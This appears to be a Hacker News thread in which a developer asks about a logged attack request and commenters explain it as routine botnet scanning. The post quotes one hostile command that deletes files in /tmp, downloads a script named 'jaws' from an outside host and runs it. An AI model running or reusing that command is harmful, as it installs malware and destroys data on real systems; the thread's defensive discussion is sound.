Hacker News new | ask | show | jobs
Ask HN: An Attempted Hack from 112.168.59.114
6 points by 191101 2202 days ago
Trundling through the production logs, I found this which looks like an attempted hack from WELOVEURLHAUSBOT.zerohoes.tk. I'm not sure what the jaws file does but anything called 'jaws' is probably not benign. I highly appreciate any advice on how to strengthen security in light of this.

Started GET "/shell?cd+/tmp;rm+-rf+*;wget+http://WELOVEURLHAUSBOT.zerohoes.tk/jaws;sh+/tmp/jaws"
5 comments
Nextgrid 2202 days ago
It's just the Internet's "background noise", lots of compromised machines try to attack others. Any well-designed application will be immune to this.

This particular attempt isn't cutting-edge and isn't trying to exploit some obscure vulnerability. They're not even "exploiting" anything, they are literally probing for an endpoint that is designed to happily execute any shell command passed to it (because I guess someone somewhere was stupid enough to implement something like this?). This is the digital equivalent of "asking nicely".

They're trying to download a malicious shell script to the /tmp folder (that will in turn download more malware, most likely a cryptocurrency miner) and run it. Looking at the script (which is still available as of now) it does many attempts to download different variations of a malicious executable, each compiled for a different architecture. The list of architectures is quite broad (PPC and M68K even) so on that front they've done their job very thoroughly to maximize the potential yield.

link
191101 2202 days ago
This was very helpful thank you. I found it odd that the attack was so 'blunt', for lack of a better word, and thought I may be missing something.
link
forgotmypw17 2202 days ago
Yeah, I frequently get all kinds of requests for /config.php, /admin/, etc.
link
jaclaz 2202 days ago
>but anything called 'jaws' is probably not benign

Not always, only for the record, JAWS is actually the name of a common program to read the screen for people visually impaired:

https://www.freedomscientific.com/products/software/jaws/

Of course this has nothing to do with your case.

link
jamieweb 2202 days ago
The tk, gq, cf, ml and ga TLDs offer free registration, so they're widely used in scams and fraud.

In most cases you can safely block all traffic to/from them, as well as email addresses using them.

link
obverse 2202 days ago
Do you have a route for '/shell' ?
link
191101 2202 days ago
I don't but per the previous reply, I imagine this would've been quite bad =)) I can't really think of why someone would create an API that exposes a shell to anyone asking.
link
bjourne 2202 days ago
The script is probably probing for already compromised machines.
link
sarcasmatwork 2202 days ago
fail2ban
link